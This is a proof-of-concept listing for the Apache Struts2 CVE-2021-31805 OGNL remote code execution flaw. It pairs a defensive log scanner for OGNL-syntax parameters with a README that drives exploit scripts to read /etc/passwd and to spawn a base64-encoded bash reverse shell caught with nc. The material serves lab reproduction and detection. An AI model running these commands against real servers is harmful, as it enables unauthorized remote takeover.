
CVE-2021-31805 PoC — Forced OGNL evaluation, when evaluated on raw not validated user input in tag attributes, may lead to RCE.

Source
Associated Vulnerability
Title: Forced OGNL evaluation, when evaluated on raw not validated user input in tag attributes, may lead to RCE. (CVE-2021-31805)
Description: The fix issued for CVE-2020-17530 was incomplete, so from Apache Struts 2.0.0 to 2.5.29 some tag attributes could still perform a double evaluation if a developer applied forced OGNL evaluation using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to remote code execution and security degradation.
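As an added defender-side example (not code from the PoC repository or from the Struts project), the script below scans web-server access-log lines for request parameters that carry OGNL expression syntax (`%{...}`, `${...}`, `#name`, `@class@`), which is exactly the kind of raw input the advisory says must never reach a forced-evaluation tag attribute. The log format, client addresses and parameter names are constructed for this example; the marker list is a coarse heuristic, not a complete OGNL grammar.

```python
"""Added example: flag HTTP request parameters that contain OGNL expression syntax.

Everything below (log lines, parameter names, addresses) is constructed for the
example; the only thing taken from the advisory is the %{...} forced-evaluation
syntax that must not be applied to raw user input.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Syntax markers that indicate an OGNL expression rather than plain data:
# forced evaluation %{..}, the older ${..} form, context variables (#name) and
# static member references (@some.Class@member).
OGNL_MARKERS = re.compile(r"(%\{|\$\{|#\w+|@[\w.]+@)")

# Apache "combined" style request line: "METHOD target HTTP/x.y"
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def params_from_target(target: str):
    """Split a request target (path?query) into decoded (name, value) pairs."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def suspicious_params(target: str):
    """Return (name, decoded value) pairs whose value contains OGNL syntax.

    parse_qsl percent-decodes once; a second unquote() catches values that were
    double-encoded (e.g. %2523 -> %23 -> #) to slip past a single-decode filter.
    """
    hits = []
    for name, value in params_from_target(target):
        decoded = unquote(value)
        if OGNL_MARKERS.search(decoded):
            hits.append((name, decoded))
    return hits


def scan_log(lines):
    """Return [(line_no, client_ip, hits)] for lines with OGNL-looking parameters."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue  # not a request line we understand; skip
        hits = suspicious_params(m.group("target"))
        if hits:
            findings.append((line_no, line.split()[0], hits))
    return findings


# Constructed sample access-log lines (not real traffic): a benign request,
# a single-encoded %{1+1} probe and a double-encoded #request context reference.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Apr/2022:10:00:01 +0000] "GET /index.action?name=alice HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Apr/2022:10:00:02 +0000] "GET /index.action?name=%25%7B1%2B1%7D HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Apr/2022:10:00:03 +0000] "POST /index.action?id=%2523request HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for line_no, ip, hits in scan_log(SAMPLE_LOG):
        print(f"line {line_no} from {ip}: {hits}")
```

Run it as a file to see the two flagged sample lines; point `scan_log` at real log lines to triage. This only finds probes after the fact. The fix the advisory implies is to upgrade to a Struts release after 2.5.29 and, in templates, never wrap request-derived values in `%{...}`.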
Description
Apache Struts2 S2-062 remote code execution vulnerability (CVE-2021-31805) | Reverse shell
Readme
# Struts2_S2-062_CVE-2021-31805
Apache Struts2 S2-062 remote code execution vulnerability (CVE-2021-31805) | Reverse shell
# Vulnerability reproduction environment

docker-compose.yml
```
version: '2'
services:
  struts2:
    image: vulhub/struts2:2.5.25
    ports:
      - "8080:8080"
```
Pull the image and start the environment:
```
docker-compose up -d
```
Access URL: http://1.1.1.1:8080
# Vulnerability verification script
```
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action "cat /etc/passwd"
```
![passwd](./images/passwd.png)
```
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action whoami
```
![root](./images/root.png)
```
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action id
```
![id](./images/id.png)
# Reverse shell
## Start a port listener with nc
```
nc -lvvp 8081
```
![NC](./images/NC.png)

Build the base64-encoded reverse shell command; it can be generated with the following site: https://ir0ny.top/pentest/reverse-encoder-shell.html
![base64](./images/base64.png)
## Getting a shell
```
python CVE-2021-31805_Shell.py http://1.1.1.1:8080/index.action "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODA4MCAwPiYx}|{base64,-d}|{bash,-i}"
```
![shell](./images/shell.png)

## Shell obtained successfully

![Shell_code](./images/Shell_code.png)


# Disclaimer
Do not use this for illegal purposes; it is for security testing only, and this project bears no responsibility for any consequences otherwise.
Note: only test websites with proper authorization. Hack sites without rules, and your family will shed tears.
File Snapshot

```
[4.0K] /data/pocs/f1be6d3a04d6d6831d107b3b702cf9ba20149e59
├── [2.0K] CVE-2021-31805_Shell.py
├── [4.0K] images
│   ├── [ 35K] base64.png
│   ├── [ 11K] id.png
│   ├── [ 70K] NC.png
│   ├── [ 53K] passwd.png
│   ├── [   1] README.md
│   ├── [ 10K] root.png
│   ├── [296K] Shell_code.png
│   └── [ 49K] shell.png
├── [1.4K] README.md
├── [  52] requirements.txt
└── [2.1K] Struts2_S2-062_CVE-2021-31805.py

1 directory, 12 files
```